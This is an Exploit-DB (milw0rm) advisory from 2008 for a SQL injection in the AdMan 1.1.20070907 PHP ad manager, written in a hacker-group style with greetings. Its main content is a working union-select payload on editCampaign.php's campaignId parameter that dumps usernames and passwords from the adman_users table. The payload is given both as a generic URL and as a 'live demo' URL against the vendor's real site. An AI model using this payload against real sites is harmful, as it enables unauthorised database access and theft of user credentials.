AdMan 1.1.20070907 - 'campaignId' SQL Injection

EDB-ID:

6702


Author:

SuB-ZeRo

Type:

webapps


Platform:

PHP

Date:

2008-10-08


############### >>> Remote SQL Injection <<<  ###########
##    SuB-ZeRo(Walid)                                                              ##
################## >>> SuB-ZeRo  <<< ################
 author  :  SuB-ZeRo(algeria hackers)
 contact :  FbH@hotmail.com
                
 
 buy script : http://www.formfields.com/adManArea/adManPricing.php
dork    : find it
 exploit:
 www.site.me/editCampaign.php?campaignId=-2'+union+select+concat(password,0x3a,username)+from+adman_users/*
 L!Ve DeMo  :::
 http://www.formfields.com/adManArea/adMan1/adMan/advertiser/editCampaign.php?campaignId=-2'+union+select+concat(password,0x3a,username)+from+adman_users/*
 NoTe:YoU must singup and login in web sit and you put your exploit
########### Greetz #############
>>> SuB-ZeRo
>>>my best freinds :: x.CJP.X & ach2008 & carlos the jackel & HiSoK4
>>> all muslims

# milw0rm.com [2008-10-08]